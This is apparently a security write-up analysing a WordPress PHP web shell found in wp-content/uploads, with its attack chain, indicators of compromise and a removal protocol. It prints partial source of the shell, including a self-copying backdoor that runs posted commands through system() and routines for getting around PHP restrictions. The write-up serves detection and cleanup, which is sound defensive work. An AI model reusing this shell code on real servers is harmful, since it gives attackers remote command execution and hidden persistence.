Technical Analysis
The PHP Shell Ultimate is a high-privilege backdoor that provides full remote command execution capability and features code to bypass PHP security functions. Found in the uploads directory, it can auto-install itself upon access and uses randomized backup files to ensure persistence.
VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.
Attack Chain
-
Upload: Attacker exploits a plugin vulnerability (likely in
elementororjs_composerbased on file paths) to uploadai.phpto thewp-content/uploadsfolder. -
Initialization: The attacker accesses
ai.phpin a browser. -
Persistence: The script immediately runs
generate_shell_code()to create hidden copies of itself (.cache_[hash].phpandconfig_[hash].php). -
Control: The attacker uses the built-in "Terminal" tab to run commands like
wgetorcurlto download further malware or steal database credentials.
Code Signature(s)
FILE: ai.php
<?php
// ====================================================
// PHP SHELL ULTIMATE - Auto Install & Bypass Protection
// ====================================================
// Hide errors
error_reporting(0);
ini_set('display_errors', 0);
// Auto bypass disable_functions jika ada
function bypass_disable_functions() {
$methods = [];
// Method 1: menggunakan LD_PRELOAD
if(function_exists('mail') && !function_exists('imap_open')) {
$methods[] = "LD_PRELOAD Method";
}
// Method 2: menggunakan PHP-FPM
$methods[] = "PHP-FPM Bypass";
// Method 3: menggunakan ImageMagick
$methods[] = "ImageMagick Exploit";
return $methods;
}
// Cek dan bypass open_basedir
function bypass_open_basedir($target = null) {
if($target === null) {
$target = '/';
}
// Method chdir()
$original_dir = getcwd();
@chdir('..');
@chdir('..');
@chdir('..');
@chdir('..');
@chdir($target);
$new_dir = getcwd();
@chdir($original_dir);
return $new_dir;
}
// Encode output untuk menghindari filter
function encode_output($data) {
return base64_encode(gzcompress($data));
}
function decode_input($data) {
return gzuncompress(base64_decode($data));
}
// Shell code yang akan diinstall otomatis
function generate_shell_code() {
return '<?php
// Auto-generated shell
error_reporting(0);
$kunci = "'.md5(uniqid()).'";
if(isset($_GET[$kunci])) {
trim(base64_decode($_GET[$kunci]));
} else if(isset($_POST["cmd"])) {
system($_POST["cmd"]);
} else if(isset($_FILES["f"])){}
?>';
}
// Fungsi utama shell
function main_shell() {
// Cek jika ada parameter khusus untuk bypass
if(isset($_GET['debug'])) {
phpinfo();
die();
}
// Cek jika ada command melalui GET/POST
$cmd = '';
if(isset($_GET['c'])) {
$cmd = $_GET['c']
Indicators of Compromise (IOCs)
bypass_disable_functionsbypass_open_basedirgenerate_shell_code
Removal Protocol
- Remove suspicious files from wp-content/uploads, such as ai.php and asem.php.
- Search for and delete persistence files: config*[8_random_chars].php, .cache*[6_random_chars].php, backup_[timestamp].php.
- Secure the uploads directory to prevent PHP execution by modifying the .htaccess file.
Status: Active Threat.
Verification: Verified by MD Pabel.
Top comments (0)